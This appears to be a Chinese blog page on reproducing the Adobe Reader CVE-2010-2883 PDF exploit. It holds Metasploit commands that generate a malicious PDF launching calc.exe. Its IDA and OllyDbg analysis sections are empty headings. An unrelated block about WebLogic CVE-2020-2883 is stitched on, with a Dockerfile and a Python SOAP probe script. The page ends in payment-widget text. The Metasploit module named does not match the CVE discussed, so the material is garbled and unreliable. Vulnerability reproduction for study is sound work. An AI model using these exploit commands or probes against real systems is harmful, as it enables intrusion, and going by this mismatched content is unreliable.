CVE-2010-2883

本文介绍了一个针对Adobe Reader 9.3.0版本的PDF漏洞利用过程,包括环境搭建步骤、所需工具及软件配置,通过IDA进行静态分析,并使用OD进行动态调试,最终实现在目标系统上弹出calc.exe。


一 环境准备

 1  POC的准备

   我们需要在被攻击的机器上面弹出calc.exe

  

use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

2  Adober的准备

  AdbeRdr930_zh_CN.exe


3  PDFStreamDumper准备 

  PDFStreamDumper_Setup.exe,用于提取SING表。


4  IDA


5 OD


二  IDA 静态分析




三 OD动态调试



四 总结 











### 关于 CVE-2020-2883 的 VulHub 配置 目前在官方的 VulHub 项目中并未提供针对 Oracle WebLogic Server CVE-2020-2883 漏洞的具体配置文件[^5]。然而,可以手动创建相应的 Dockerfile 和配置文件来模拟该漏洞环境。 以下是基于已知信息的手动搭建方法: #### 手动构建 CVE-2020-2883 复现环境 1. **克隆 VulHub 仓库** 如果尚未安装 VulHub,请先通过以下命令获取其源码: ```bash git clone https://github.com/vulhub/vulhub.git ``` 2. **准备目标版本的 WebLogic** CVE-2020-2883 影响的是 Oracle WebLogic Server 版本 10.3.6.0.0 至 12.2.1.4.0。因此需要下载受影响的目标版本并将其放置到适当路径下。 3. **编写自定义 Dockerfile** 创建一个新的目录用于存储此漏洞的相关文件,并编辑 `Dockerfile` 文件如下所示: ```dockerfile FROM oraclelinux:7-slim RUN yum install -y unzip wget && \ mkdir /weblogic && \ cd /weblogic && \ wget http://example.com/path_to_weblogic.zip && \ # 替换为目标版本的实际链接 unzip weblogic.zip && \ rm -f weblogic.zip EXPOSE 7001 CMD ["java", "-jar", "/weblogic/startWebLogic.sh"] ``` 4. **启动容器服务** 使用 Docker Compose 或者单独运行上述镜像即可完成部署工作。 5. **验证漏洞存在性** 利用公开 POC 测试工具确认是否存在未授权访问或其他安全风险行为。 注意:以上过程仅为学习研究用途,在未经授权情况下不得对任何真实系统实施攻击测试操作。 ```python import requests url = 'http://target_ip:port/wls-wsat/CoordinatorPortType' headers = {'content-type': 'text/xml'} body = """<?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"> <soapenv:Header> <wsse:Security soapenv:mustUnderstand="true" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"/> </soapenv:Header> </soapenv:Envelope>""" response = requests.post(url, data=body, headers=headers) if response.status_code == 200 and '<faultcode>' not in response.text: print('可能存在 CVE-2020-2883 漏洞') else: print('暂无发现明显异常') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值